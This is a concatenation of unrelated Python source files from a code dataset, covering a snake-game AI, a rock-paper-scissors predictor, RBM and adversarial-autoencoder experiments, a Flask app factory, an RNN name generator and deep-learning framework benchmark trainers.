scan[6][0] = scan_wall(backward_left_x, backward_left_y, backward_left_range)
scan[7][0] = scan_food(forward_x, forward_y, forward_range) # scanning food in all directions
scan[8][0] = scan_food(right_x, right_y, right_range)
scan[9][0] = scan_food(left_x, left_y, left_range)
scan[10][0] = scan_food(forward_right_x, forward_right_y, forward_right_range)
scan[11][0] = scan_food(forward_left_x, forward_left_y, forward_left_range)
scan[12][0] = scan_food(backward_right_x, backward_right_y, backward_right_range)
scan[13][0] = scan_food(backward_left_x, backward_left_y, backward_left_range)
scan[14][0] = scan_self(forward_x, forward_y, forward_range) # scanning body in all directions
scan[15][0] = scan_self(right_x, right_y, right_range)
scan[16][0] = scan_self(left_x, left_y, left_range)
scan[17][0] = scan_self(forward_right_x, forward_right_y, forward_right_range)
scan[18][0] = scan_self(forward_left_x, forward_left_y, forward_left_range)
scan[19][0] = scan_self(backward_right_x, backward_right_y, backward_right_range)
scan[20][0] = scan_self(backward_left_x, backward_left_y, backward_left_range)
self.snake.vision = scan # gives snake vision
@jit(nopython=True)
def distance(p1=None, p2=None):
"""
Gives euclidian distance between two points
@jit is used to speed up computation
:param p1: origin point
:param p2: end point
:return: distance
"""
return math.sqrt((p2[0] - p1[0]) ** 2 + (p2[1] - p1[1]) ** 2)
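# Illustrative check: distance((0, 0), (3, 4)) == 5.0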
``` |
{
"source": "0-gb/Mind-Reading-AI",
"score": 3
} |
#### File: 0-gb/Mind-Reading-AI/main.py
```python
from sklearn.naive_bayes import GaussianNB
from tkinter import Tk, Label
import random
def get_id_dictionary(allowed_symbols_local):
vocab = sorted(set(allowed_symbols_local))
constructed_char_2_int = {}
constructed_int_2_char = {}
counter = 0
for letter in vocab:
constructed_char_2_int[letter] = counter
constructed_int_2_char[counter] = letter
counter += 1
return constructed_char_2_int, constructed_int_2_char
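# Illustrative: get_id_dictionary('RPS') -> ({'P': 0, 'R': 1, 'S': 2}, {0: 'P', 1: 'R', 2: 'S'})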
def preprocess_char(char):
global correct_count
selected_key = char_2_int[char.capitalize()]
prediction_correct = predicted_key == selected_key
if prediction_correct:
correct_count += 1
return selected_key, prediction_correct, correct_count
def step_preprocess_x_y(learn_X, learn_Y, selected_key):
learn_X.pop(0)
learn_Y.pop(0)
learn_X.append(X_advanced)
learn_Y.append(selected_key)
return learn_X, learn_Y
def create_next_x(learn_X, selected_key, prediction_correct):
X_advanced = learn_X[-1][1:-1]
X_advanced.append(selected_key)
X_advanced.append(prediction_correct)
return X_advanced
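# Sketch of the feature layout: learn_X[-1] holds a sliding window of past moves plus a
# "was the last prediction correct" flag, so each step drops the oldest move and the old
# flag, then appends the newest move and the new correctness flag.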
def texts_from_metrics(selected_key, predicted_key, accuracy, window_accuracy, window_size):
global int_2_char
output_text1 = "Chosen - Prediction : " + int_2_char[selected_key] + " - " + int_2_char[predicted_key]
output_text2 = "Overall accuracy: {:.2f}".format(accuracy)
output_text3 = "Last {} guesses accuracy: {:.2f}".format(window_size, window_accuracy)
output_text4 = ""
if accuracy > 1 / 3:
output_text4 += "Human successfully predicted by AI "
else:
output_text4 += "Human not successfully predicted by AI"
return [output_text1, output_text2, output_text3, output_text4]
def process_key_press(event):
if event.char not in 'rspRSP' or len(event.char) < 1:
return
global case_counter, predicted_key, X_advanced, correctness_hist, learn_X, learn_Y
selected_key, prediction_correct, accurate_guesses = preprocess_char(event.char)
learn_X, learn_Y = step_preprocess_x_y(learn_X, learn_Y, selected_key)
case_counter += 1
accuracy = accurate_guesses / case_counter
correctness_hist.append(prediction_correct)
window_accuracy = sum(correctness_hist[-window_size:]) / min(case_counter, window_size)
X_advanced = create_next_x(learn_X, selected_key, prediction_correct)
output_texts = texts_from_metrics(selected_key, predicted_key, accuracy, window_accuracy, window_size)
w1 = Label(root, text=output_texts[0], anchor="w", width=300)
w2 = Label(root, text=output_texts[1], anchor="w", width=300)
w3 = Label(root, text=output_texts[2], anchor="w", width=300)
w4 = Label(root, text=output_texts[3], anchor="w", width=300)
w1.place(x=10, y=10)
w2.place(x=10, y=30)
w3.place(x=10, y=50)
w4.place(x=10, y=70)
clf.partial_fit([learn_X[-1]] * case_counter, [learn_Y[-1]] * case_counter)
predicted_key = clf.predict([X_advanced])[0]
allowed_symbols = 'RPS'
char_2_int, int_2_char = get_id_dictionary(allowed_symbols)
correctness_hist = []
window_size = 100
work_list = [char_2_int[element] for element in
','.join(random.choice(allowed_symbols) for _ in range(2 * window_size)).split(',')]
learn_X = [work_list[i:i + window_size] for i in range(0, len(work_list) - window_size)]
for i in range(0, len(work_list) - window_size):
learn_X[i].append(random.randint(0, 1))
learn_Y = work_list[window_size:]
predicted_key = char_2_int[random.choice(allowed_symbols)]
X_advanced = create_next_x(learn_X, learn_Y[-1], predicted_key)
correct_count, case_counter = 0, 0
clf = GaussianNB()
clf.fit(learn_X, learn_Y)
root = Tk()
root.geometry('600x100')
root.bind("<Key>", process_key_press)
root.mainloop()
``` |
{
"source": "0Gemini0/generative-models",
"score": 3
} |
#### File: RBM/RBM_binary_cd/rbm_binary_cd.py
```python
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import os
from tensorflow.examples.tutorials.mnist import input_data
if not os.path.exists('out/'):
os.makedirs('out/')
mnist = input_data.read_data_sets('../../MNIST_data', one_hot=True)
X_dim = mnist.train.images.shape[1]
y_dim = mnist.train.labels.shape[1]
mb_size = 16
h_dim = 36
W = np.random.randn(X_dim, h_dim) * 0.001
def sigm(x):
return 1/(1 + np.exp(-x))
def infer(X):
# mb_size x x_dim -> mb_size x h_dim
return sigm(X @ W)
def generate(H):
# mb_size x h_dim -> mb_size x x_dim
return sigm(H @ W.T)
# Contrastive Divergence
# ----------------------
# Approximate the log partition gradient Gibbs sampling
alpha = 0.1
K = 10 # Num. of Gibbs sampling step
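# CD-K sketch: the weight update below approximates
#   dW ~ E_data[v h^T] - E_model[v' h'^T]
# where (v', h') is obtained by running K Gibbs steps starting from the data vector v.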
for t in range(1, 101):
X_mb = (mnist.train.next_batch(mb_size)[0] > 0.5).astype(np.float)
g = 0
for v in X_mb:
# E[h|v,W]
mu = infer(v)
# Gibbs sampling steps
# --------------------
v_prime = np.copy(v)
for k in range(K):
# h ~ p(h|v,W)
h_prime = np.random.binomial(n=1, p=infer(v_prime))
# v ~ p(v|h,W)
v_prime = np.random.binomial(n=1, p=generate(h_prime))
# E[h|v',W]
mu_prime = infer(v_prime)
# Compute data gradient
grad_w = np.outer(v, mu) - np.outer(v_prime, mu_prime)
# Accumulate minibatch gradient
g += grad_w
W += (alpha/t) / mb_size * g
# Visualization
# -------------
def plot(samples, size, name):
size = int(size)
fig = plt.figure(figsize=(4, 4))
gs = gridspec.GridSpec(4, 4)
gs.update(wspace=0.05, hspace=0.05)
for i, sample in enumerate(samples):
ax = plt.subplot(gs[i])
plt.axis('off')
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_aspect('equal')
plt.imshow(sample.reshape(size, size), cmap='Greys_r')
plt.savefig('out/{}.png'.format(name), bbox_inches='tight')
plt.close(fig)
X = (mnist.test.next_batch(mb_size)[0] > 0.5).astype(np.float)
H = np.random.binomial(n=1, p=infer(X))
plot(H, np.sqrt(h_dim), 'H')
X_recon = np.random.binomial(n=1, p=generate(H))
plot(X_recon, np.sqrt(X_dim), 'V')
```
#### File: VAE/adversarial_autoencoder/aae_pytorch.py
```python
import torch
import torch.nn
import torch.nn.functional as nn
import torch.autograd as autograd
import torch.optim as optim
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import os
from torch.autograd import Variable
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('../../MNIST_data', one_hot=True)
mb_size = 32
z_dim = 5
X_dim = mnist.train.images.shape[1]
y_dim = mnist.train.labels.shape[1]
h_dim = 128
cnt = 0
lr = 1e-3
# Encoder
Q = torch.nn.Sequential(
torch.nn.Linear(X_dim, h_dim),
torch.nn.ReLU(),
torch.nn.Linear(h_dim, z_dim)
)
# Decoder
P = torch.nn.Sequential(
torch.nn.Linear(z_dim, h_dim),
torch.nn.ReLU(),
torch.nn.Linear(h_dim, X_dim),
torch.nn.Sigmoid()
)
# Discriminator
D = torch.nn.Sequential(
torch.nn.Linear(z_dim, h_dim),
torch.nn.ReLU(),
torch.nn.Linear(h_dim, 1),
torch.nn.Sigmoid()
)
def reset_grad():
Q.zero_grad()
P.zero_grad()
D.zero_grad()
def sample_X(size, include_y=False):
X, y = mnist.train.next_batch(size)
X = Variable(torch.from_numpy(X))
if include_y:
y = np.argmax(y, axis=1).astype(np.int)
y = Variable(torch.from_numpy(y))
return X, y
return X
Q_solver = optim.Adam(Q.parameters(), lr=lr)
P_solver = optim.Adam(P.parameters(), lr=lr)
D_solver = optim.Adam(D.parameters(), lr=lr)
for it in range(1000000):
X = sample_X(mb_size)
""" Reconstruction phase """
z_sample = Q(X)
X_sample = P(z_sample)
recon_loss = nn.binary_cross_entropy(X_sample, X)
recon_loss.backward()
P_solver.step()
Q_solver.step()
reset_grad()
""" Regularization phase """
# Discriminator
z_real = Variable(torch.randn(mb_size, z_dim))
z_fake = Q(X)
D_real = D(z_real)
D_fake = D(z_fake)
D_loss = -torch.mean(torch.log(D_real) + torch.log(1 - D_fake))
D_loss.backward()
D_solver.step()
reset_grad()
# Generator
z_fake = Q(X)
D_fake = D(z_fake)
G_loss = -torch.mean(torch.log(D_fake))
G_loss.backward()
Q_solver.step()
reset_grad()
# Print and plot every now and then
if it % 1000 == 0:
print('Iter-{}; D_loss: {:.4}; G_loss: {:.4}; recon_loss: {:.4}'
.format(it, D_loss.data[0], G_loss.data[0], recon_loss.data[0]))
samples = P(z_real).data.numpy()[:16]
fig = plt.figure(figsize=(4, 4))
gs = gridspec.GridSpec(4, 4)
gs.update(wspace=0.05, hspace=0.05)
for i, sample in enumerate(samples):
ax = plt.subplot(gs[i])
plt.axis('off')
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_aspect('equal')
plt.imshow(sample.reshape(28, 28), cmap='Greys_r')
if not os.path.exists('out/'):
os.makedirs('out/')
plt.savefig('out/{}.png'
.format(str(cnt).zfill(3)), bbox_inches='tight')
cnt += 1
plt.close(fig)
``` |
{
"source": "0gener/flask-shopping-list",
"score": 3
} |
#### File: flask-shopping-list/application/__init__.py
```python
from flask import Flask
from flask_restful import Api
from flask_sqlalchemy import SQLAlchemy
from instance.config import app_config
api = Api()
db = SQLAlchemy()
def create_app(config):
app = Flask(__name__, instance_relative_config=True)
app.config.from_object(app_config[config])
db.init_app(app)
api.init_app(app)
return app
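# Illustrative usage (assumes a "development" key exists in app_config):
# app = create_app("development")
# app.run(debug=True)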
``` |
{
"source": "0gjimenez/Final_Exam001",
"score": 4
} |
#### File: 0gjimenez/Final_Exam001/three.py
```python
def tell_story():
a = Bird()
b = Dragon()
c = Gorilla()
# Generate as many other objects as you want
d = Beetle()
e = Chipmunk()
f = Snake()
g = Cobra()
h = Goat()
i = Sheep()
j = Donkey()
k = Pig()
# Have objects interact
e.eat(g)
b.eat(d)
b.eat(h)
j.eat(b)
# replace the replace_me_object
replace_me_object = b
final_phrase = replace_me_object.talk()
return final_phrase
class Animal:
def __init__(self):
self.phrase = ""
def eat(self, other):
self.phrase += str(other.phrase)
def talk(self):
return self.phrase
class Beetle(Animal):
def __init__(self):
super().__init__()
self.phrase = "ztrauq kcalb"
class Bird(Animal):
def __init__(self):
super().__init__()
self.phrase = "Tweet"
class Dragon(Animal):
def __init__(self):
super().__init__()
def eat(self, other):
self.phrase = str(other.phrase[::-1])
def talk(self):
return self.phrase[0::2]
class Gorilla(Animal):
def __init__(self):
super().__init__()
self.phrase = "123456789"
def beat(self, other1, other2):
self.phrase = str(other1.phrase) + " " + str(other2.phrase)
class Chipmunk(Animal):
def __init__(self):
super().__init__()
self.phrase = "Munchd"
def eat(self,other):
self.phrase = str(other.phrase[0])
class Snake(Animal):
def __init__(self):
super().__init__()
self.phrase = "Hiss"
def eat(self,other):
self.phrase = str(other.phrase).toLower()
class Cobra(Animal):
def __init__(self):
super().__init__()
self.phrase = "Snorflek"
def eat(self,other):
self.phrase = str(other.phrase).toUpper()
class Goat(Animal):
def __init__(self):
super().__init__()
self.phrase = "Brae"
def eat(self,other):
self.phrase = str(other.phrase)+str(",")
class Sheep(Animal):
def __init__(self):
super().__init__()
self.phrase = "GypJ"
class Donkey(Animal):
def __init__(self):
super().__init__()
self.phrase = "vozx"
def eat(self,other):
self.phrase = str(other.phrase)+str("!")
class Pig(Animal):
def __init__(self):
super().__init__()
self.phrase ="eduj"
if __name__ == "__main__":
print(tell_story()=="Sphinx of black quartz, judge my vow!")
``` |
{
"source": "0HenryH/ai2021s",
"score": 3
} |
#### File: ai2021s/AI-lec8-rnn/gen_en.py
```python
import time
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import itertools
import collections
import matplotlib.pyplot as plt
# Read in data
# df = pd.read_csv("Chinese_Names_Corpus_Gender(120W).txt", header=2)
df = pd.read_csv("English_Cn_Name_Corpus(48W).txt", header=None, names=["name"], skiprows=2)
names = df["name"].values
# Compute character frequency
chars = [list(name) for name in names]
chars_flatten = list(itertools.chain(*chars))
freq = collections.Counter(chars_flatten)
freq = pd.DataFrame(freq.items(), columns=["char", "freq"])
freq = freq.sort_values(by="freq", ascending=False)
# Power law (?)
char_rank = np.arange(freq.shape[0])
char_freq = freq["freq"].values
plt.plot(char_rank, char_freq)
plt.plot(np.log(1.0 + char_rank), np.log(char_freq))
# Prepare data
dict_size = 50
charset_size = dict_size + 1 # for EOS
dict = list(freq["char"].values[:dict_size])
dict_set = set(dict)
dat = list(filter(lambda name: set(name).issubset(dict_set), names))
# One-hot encoding
def char2index(char):
return dict.index(char)
def name2index(name):
return [char2index(char) for char in name]
def char2tensor(char):
tensor = torch.zeros(1, charset_size)
tensor[0, char2index(char)] = 1
return tensor
def name2tensor(name):
tensor = torch.zeros(len(name), 1, charset_size)
for i, char in enumerate(name):
tensor[i, 0, char2index(char)] = 1
return tensor
def names2tensor(names):
n = len(names)
lens = [len(name) for name in names]
max_len = np.max(lens)
tensor = torch.zeros(max_len, n, charset_size)
target = torch.zeros(max_len, n, dtype=int) + charset_size - 1
for i in range(n):
name = names[i] # the i-th name
for j in range(len(name)): # the j-th character in the name
tensor[j, i, char2index(name[j])] = 1
if j < len(name) - 1:
target[j, i] = char2index(name[j + 1])
return tensor, np.array(lens), target
char2index("斯")
name2index("斯基")
char2tensor("斯")
name2tensor("斯基")
names2tensor(["斯基", "斯诺夫"])
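# Shape sketch (illustrative): names2tensor(["斯基", "斯诺夫"]) returns a
# (max_len=3, batch=2, charset_size) one-hot tensor, the true lengths [2, 3], and
# next-character targets padded with the EOS index (charset_size - 1).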
# Build model
class RNN(nn.Module):
def __init__(self, input_size, hidden_size):
super(RNN, self).__init__()
self.hidden_size = hidden_size
self.i2h = nn.Linear(input_size + hidden_size, hidden_size)
self.i2o = nn.Linear(input_size + hidden_size, input_size)
self.o2o = nn.Linear(hidden_size + input_size, input_size)
self.dropout = nn.Dropout(0.1)
self.logsoftmax = nn.LogSoftmax(dim=1)
def forward(self, input, hidden):
input_combined = torch.cat((input, hidden), 1)
hidden = torch.relu(self.i2h(input_combined))
output = torch.relu(self.i2o(input_combined))
output_combined = torch.cat((hidden, output), 1)
output = self.o2o(output_combined)
output = self.dropout(output)
output = self.logsoftmax(output)
return output, hidden
def init_hidden(self, batch_size):
return torch.zeros(batch_size, self.hidden_size)
n_hidden = 64
rnn = RNN(charset_size, n_hidden)
input = name2tensor("斯基")
hidden = rnn.init_hidden(batch_size=1)
output, next_hidden = rnn(input[0], hidden)
np.random.seed(123)
torch.random.manual_seed(123)
device = torch.device("cuda")
# device = torch.device("cpu") # If no GPU on the machine
# train_id = np.random.choice(len(dat), 10000)
# train = [dat[i] for i in train_id]
train = dat
n = len(train)
n_hidden = 256
nepoch = 100
bs = 256
rnn = RNN(charset_size, n_hidden)
rnn = rnn.to(device=device)
opt = torch.optim.Adam(rnn.parameters(), lr=0.001)
train_ind = np.arange(n)
lossfn = nn.NLLLoss(reduction="none")
losses = []
t1 = time.time()
for k in range(nepoch):
np.random.shuffle(train_ind)
# Update on mini-batches
for j in range(0, n, bs):
# Create mini-batch
ind = train_ind[j:(j + bs)]
mb = [train[i] for i in ind]
mb_size = len(mb)
input, actual_len, target = names2tensor(mb)
input = input.to(device=device)
target = target.to(device=device)
max_len = input.shape[0]
hidden = rnn.init_hidden(mb_size).to(device=device)
loss = 0.0
for s in range(max_len):
output, hidden = rnn(input[s], hidden)
loss_s = lossfn(output, target[s])
valid = torch.tensor((s < actual_len).astype(int)).to(device=device)
loss = loss + loss_s * valid
loss = torch.mean(loss / torch.tensor(actual_len).to(device=device))
opt.zero_grad()
loss.backward()
opt.step()
losses.append(loss.item())
if j // bs % 10 == 0:
print(f"epoch {k}, batch {j // bs}, loss = {loss.item()}")
t2 = time.time()
print(t2 - t1)
plt.plot(losses)
# torch.save(rnn.state_dict(), "gen_en.pt")
# rnn.load_state_dict(torch.load("gen_en.pt"))
# rnn.eval()
family_names = np.unique([name[0] for name in dat])
def random_family_name():
return np.random.choice(family_names, 1)[0]
def random_name(max_len=4):
rnn.eval()
family_name = random_family_name()
input = char2tensor(family_name).to(device=device)
char_ind = [torch.argmax(input).item()]
hidden = rnn.init_hidden(batch_size=1).to(device=device)
for i in range(max_len - 1):
output, hidden = rnn(input, hidden)
ind = torch.argmax(output).item()
if ind == charset_size - 1:
break
char_ind.append(ind)
input.zero_()
input[0, ind] = 1.0
return char_ind
np.random.seed(123)
torch.random.manual_seed(123)
ind = random_name(10)
print("".join([dict[i] for i in ind]))
np.random.seed(123)
torch.random.manual_seed(123)
names = []
for i in range(50):
ind = random_name(10)
names.append("".join([dict[i] for i in ind]))
np.set_printoptions(linewidth=50)
print(np.array(names))
``` |
{
"source": "0h-n0/DL_benchmarks",
"score": 2
} |
#### File: DL_benchmarks/benchmark/main.py
```python
import json
from pathlib import Path
from importlib import import_module
import numpy as np
from tqdm import tqdm
from sacred import Experiment
from sacred.observers import FileStorageObserver
import torchvision.datasets
from benchmark.data import Iterator
ex = Experiment('benchmark')
project_root = Path(__file__).resolve().parent.parent
data_dir = project_root / 'results'
ex.observers.append(FileStorageObserver.create(str(data_dir)))
@ex.config
def config():
"""
"""
project_root = str(project_root)
ngpu = 1 # ngpu = 0 corresponds to cpu-mode
    data_type = 'image' # You can choose a data type from this list: ['image', 'sequence', 'mnist', 'cifer-10']. 'image' and 'sequence' are dummy data.
assert data_type in ['image', 'sequence', 'mnist', 'cifer-10'], \
"Your data_type[{}] is not supported.".format(data_type)
batch_size = 128
image_shape = (3, 28, 28)
progressbar = True
framework = 'torch'
dnn_arch = 'CNN'
opt_type = 'SGD'
opt_conf = dict(
lr = 0.01,
momentum = 0.9
)
trainer_options = dict(
mode='train',
benchmark_mode=True,
half=False,
parallel_loss=True,
)
time_options = 'total'
assert time_options in ['total', 'forward', 'backward'], \
"Your time_options[{}] is not supported.\n".format(dnn_arch)
assert dnn_arch.lower() in ['cnn', 'dnn', 'rnn', 'lstm', 'capsnet'
'blstm', 'gru', 'alexnet', 'resnet', 'vgg16'], \
"Your dnn_arch[{}] is not supported.\n".format(dnn_arch)
if dnn_arch.lower() in ['resnet']:
batch_size = 92
image_shape = (3, 200, 200)
data_options = dict(
image_shape = image_shape, # (channel, witdth, height)
sequence_shape = 28, # feature
niteration = 1000,
batch_size = batch_size,
label_size = 3000,
target_type = None,
random_generation = False, # If this flag is False, iterator returns same array in all iterations.
)
rnn_layers = 4
framework_version = None
assert framework in ['torch', 'mxnet', 'chainer', 'caffe2',
'cntk', 'tensorflow', 'dynet', 'nnabla', 'neon'], \
"Your framework[{}] is not supported.\n".format(framework)
@ex.capture
def get_iterator(framework, data_type, data_options, progressbar):
dtype = data_type.lower()
if dtype == 'mnist':
        from torchvision import datasets, transforms
        # check data.
        train_iter = datasets.MNIST('../data', train=True, download=True,
                                    transform=transforms.Compose([
                                        transforms.ToTensor(),  # convert PIL images to tensors before normalizing
                                        transforms.Normalize((0.1307,), (0.3081,))
                                    ]))
        test_iter = datasets.MNIST('../data', train=False, download=True,
                                   transform=transforms.Compose([
                                       transforms.ToTensor(),
                                       transforms.Normalize((0.1307,), (0.3081,))
                                   ]))
elif dtype == 'image':
if framework == 'tensorflow':
data_options['target_type'] = 'one-hot'
train_iter = Iterator(data_type, **data_options)
test_iter = None
if progressbar:
train_iter = tqdm(train_iter)
if test_iter:
test_iter = tqdm(test_iter)
return train_iter, test_iter
@ex.capture
def get_model(module, data_type, data_options, dnn_arch, rnn_layers, ngpu):
dtype = data_type.lower()
if dtype == 'image':
channel, xdim, ydim = data_options['image_shape']
output_num = data_options['label_size']
gpu_mode = True if ngpu >= 1 else False
if dnn_arch.lower() == 'cnn':
model = module.CNN(channel, xdim, ydim, output_num)
if dnn_arch.lower() == 'resnet':
model = module.ResNet(channel, xdim, ydim, output_num)
elif dtype == 'mnist':
channel, xdim, ydim = 1, 28, 28
output_num = 10
gpu_mode = True if ngpu >= 1 else False
if dnn_arch == 'CNN':
model = module.CNN(channel, xdim, ydim, output_num)
elif dtype == 'cifer-10':
pass
elif dtype == "sequence":
pass
return model
@ex.capture
def _get_trainer(module, model, ngpu, trainer_options, data_options, time_options):
trainer = module.Trainer(model, ngpu, trainer_options, data_options, time_options)
return trainer
@ex.capture
def get_trainer(_config, framework, framework_version, ngpu):
model = None
if framework == 'torch':
module = import_module('benchmark.models.th')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
elif framework == 'mxnet':
module = import_module('benchmark.models.mx')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
elif framework == 'chainer':
module = import_module('benchmark.models.ch')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
elif framework == 'cntk':
module = import_module('benchmark.models.ct')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
elif framework == 'tensorflow':
module = import_module('benchmark.models.tf')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
elif framework == 'neon':
module = import_module('benchmark.models.ne')
model = get_model(module=module)
trainer = _get_trainer(module=module, model=model)
else:
raise ValueError
return trainer
@ex.capture
def train(trainer, train_iter, test_iter, opt_type, opt_conf):
np.random.seed(1)
trainer.set_optimizer(opt_type, opt_conf)
results = trainer.run(train_iter, test_iter)
dump_results(results=results)
@ex.command
def setup():
pass
@ex.capture
def dump_config(_config, _run):
exp_dir = data_dir / str(_run._id)
config_file = exp_dir / "config.json"
with config_file.open('w') as fp:
json.dump(_config, fp, indent=4)
@ex.capture
def dump_results(_config, _run, results):
exp_dir = data_dir / str(_run._id)
config_file = exp_dir / "results.json"
with config_file.open('w') as fp:
json.dump(results, fp, indent=4)
@ex.automain
def main(_run, _config, project_root, framework):
train_iter, test_iter = get_iterator()
trainer = get_trainer()
train(trainer=trainer, train_iter=train_iter, test_iter=test_iter)
dump_config()
```
#### File: benchmark/models/ch.py
```python
import time
import copy
import torch
import numpy as np
from tqdm import tqdm
import chainer
from chainer import Chain
import chainer.links as L
import chainer.functions as F
from chainer.function_hooks import TimerHook
from benchmark.models.base_trainer import BaseTrainer
class Trainer(BaseTrainer):
def __init__(self, model, ngpu, options,
data_options=None, time_options=None):
self.ngpu = ngpu
self.gpu_mode = True if ngpu >= 1 else False
self.time_options = time_options
if self.gpu_mode:
self.model = [copy.deepcopy(model).to_gpu(i) for i in range(ngpu)]
else:
            self.model = [model]
if options['benchmark_mode']:
chainer.using_config('autotune', True)
def set_optimizer(self, opt_type, opt_conf):
if opt_type == 'SGD':
self.optimizer = chainer.optimizers.SGD(lr=opt_conf['lr'])
self.optimizer.setup(self.model[0])
elif opt_type == 'MomentumSGD':
self.optimizer = chainer.optimizers.MomentumSGD(lr=opt_conf['lr'],
momentum=opt_conf['momentum'])
self.optimizer.setup(self.model[0])
elif opt_type == 'Adam':
self.optimizer = chainer.optimizers.Adam(lr=opt_conf['lr'])
self.optimizer.setup(self.model[0])
else:
raise NotImplementedError
self.optimizer.use_cleargrads()
def run(self, iterator, mode='train'):
report = dict()
time_series = []
start_event = torch.cuda.Event(enable_timing=True)
end_event = torch.cuda.Event(enable_timing=True)
total_s = time.perf_counter()
for idx, (x, t) in enumerate(iterator):
if self.time_options == 'total':
start_event.record()
if self.gpu_mode:
x = x.astype(np.float32)
t = t.astype(np.int32)
minibatch = len(x) // self.ngpu
x = [chainer.Variable(
chainer.cuda.to_gpu(x[j*minibatch:(j+1)*minibatch], j))
for j in range(self.ngpu)]
t = [chainer.Variable(
chainer.cuda.to_gpu(t[j*minibatch:(j+1)*minibatch], j))
for j in range(self.ngpu)]
            else:
                # keep the single-device case list-shaped so the code below works unchanged
                x = [chainer.Variable(x.astype(np.float32))]
                t = [chainer.Variable(t.astype(np.int32))]
if self.time_options == 'forward':
with self._record(start_event, end_event):
o = [_model(_x) for _model, _x in zip(self.model, x)]
else:
o = [_model(_x) for _model, _x in zip(self.model, x)]
loss = [F.softmax_cross_entropy(_o, _t) for _o, _t in zip(o, t)]
self.optimizer.target.cleargrads()
[_model.cleargrads() for _model in self.model]
            if self.time_options == 'backward':
                with self._record(start_event, end_event):
                    [(_loss / max(self.ngpu, 1)).backward() for _loss in loss]
            else:
                [(_loss / max(self.ngpu, 1)).backward() for _loss in loss]
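            # Data-parallel step: sum the per-GPU gradients onto model[0],
            # let the optimizer update that replica, then broadcast the new
            # parameters back to every other replica.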
[self.model[0].addgrads(_model) for _model in self.model]
self.optimizer.update()
[_model.copyparams(self.model[0]) for _model in self.model]
if self.time_options == 'total':
end_event.record()
torch.cuda.synchronize()
self._elapsed_time = start_event.elapsed_time(end_event)/1000
if isinstance(iterator, tqdm):
iterator.set_description('{:>10s} :{:10.7f}s/it'.format(self.time_options,
self._elapsed_time))
time_series.append(self._elapsed_time)
torch.cuda.synchronize()
total_e = time.perf_counter()
report = dict(
time_series=time_series,
total=total_e - total_s,
)
return report
class Convblock(Chain):
def __init__(self, in_ch, out_ch, kernel, stride=1, pooling=False):
self.pooling = pooling
super(Convblock, self).__init__()
with self.init_scope():
self.conv = L.Convolution2D(in_ch, out_ch, kernel, stride=stride)
def __call__(self, x):
if self.pooling:
return F.max_pooling_2d(F.relu(self.conv(x)), (1, 2), stride=2)
else:
return F.relu(self.conv(x))
class CNN(Chain):
def __init__(self, channel, xdim, ydim, output_num):
super(CNN, self).__init__()
with self.init_scope():
self.conv1 = Convblock(channel, 180, (xdim, 3), 1)
self.conv2 = Convblock(180, 180, (1, 3), stride=1, pooling=True)
self.conv3 = Convblock(180, 180, (1, 3), stride=1)
self.conv4 = Convblock(180, 180, (1, 3), stride=1, pooling=True)
self.conv5 = Convblock(180, 180, (1, 2), stride=1)
self.conv6 = Convblock(180, 180, (1, 1), stride=1)
self.l1 = L.Linear(540, 2048)
self.l2 = L.Linear(2048, 2048)
self.l3 = L.Linear(2048, output_num)
def __call__(self, x):
h = self.conv1(x)
h = self.conv2(h)
h = self.conv3(h)
h = self.conv4(h)
h = self.conv5(h)
h = self.conv6(h)
h = self.l1(h)
h = self.l2(h)
h = self.l3(h)
return h
```
#### File: benchmark/models/ct.py
```python
import os
import time
from functools import partial
import numpy as np
import cntk as C
from cntk.device import try_set_default_device, gpu, all_devices
from cntk.io import MinibatchSource, CTFDeserializer, StreamDef, StreamDefs, INFINITELY_REPEAT
from cntk.initializer import he_normal
from cntk.layers import AveragePooling, BatchNormalization, Convolution, Dense
from cntk.ops import element_times, relu
class Trainer(object):
def __init__(self, model, ngpu, options=None):
self.model = model
self.ngpu = ngpu
self.gpu_mode = True if ngpu >= 1 else False
        if self.gpu_mode:
            self.gpus = [gpu(i) for i in range(self.ngpu)]
        self.is_parallel = False
if options:
self.progressbar = options['progressbar']
def set_optimizer(self, opt_type, opt_conf):
if opt_type == 'SGD':
self.lr_schedule = C.learning_rate_schedule(
opt_conf['lr'], C.UnitType.minibatch)
self.m_schedule = C.momentum_schedule(
opt_conf['momentum'], C.UnitType.minibatch)
else:
raise NotImplementedError
def run(self, iterator, mode='train'):
report = dict()
        input_var = C.ops.input_variable(np.prod(iterator.image_shape),
np.float32)
label_var = C.ops.input_variable(iterator.batch_size, np.float32)
model = self.model(input_var,)
ce = C.losses.cross_entropy_with_softmax(model, label_var)
pe = C.metrics.classification_error(model, label_var)
z = cnn(input_var)
learner = C.learners.momentum_sgd(z.parameters, self.lr_schedule, self.m_schedule)
if self.is_parallel:
distributed_learner = \
C.data_parallel_distributed_learner(learner=learner,
distributed_after=0)
progress_printer = \
C.logging.ProgressPrinter(tag='Training',
num_epochs=iterator.niteration)
if self.is_parallel:
trainer = C.Trainer(z, (ce, pe), distributed_learner,
progress_printer)
else:
trainer = C.Trainer(z, (ce, pe), learner, progress_printer)
for idx, (x, t) in enumerate(iterator):
total_s = time.perf_counter()
trainer.train_minibatch({input_var : x, label_var : t})
forward_s = time.perf_counter()
forward_e = time.perf_counter()
backward_s = time.perf_counter()
backward_e = time.perf_counter()
total_e = time.perf_counter()
report[idx] = dict(
forward=forward_e - forward_s,
backward=backward_e - backward_s,
total=total_e - total_s
)
return report
class CNN(object):
def __init__(self, channel, xdim, ydim, output_num):
self.cnn = partial(cnn,
channel=channel,
xdim=xdim,
ydim=ydim,
output_num=output_num)
def get_func(self):
return self.cnn
def __call__(self, x):
return self.cnn(x)
def cnn(x, channel, xdim, ydim, output_num):
net = C.layers.Convolution2D((xdim, 3), 180, activation=C.ops.relu, pad=False, strides=1)(x)
net = C.layers.Convolution2D((1, 3), 180, activation=C.ops.relu, pad=False)(net)
net = C.layers.MaxPooling((1, 2), strides=2)(net)
net = C.layers.Convolution2D((1, 3), 180, activation=C.ops.relu, pad=False)(net)
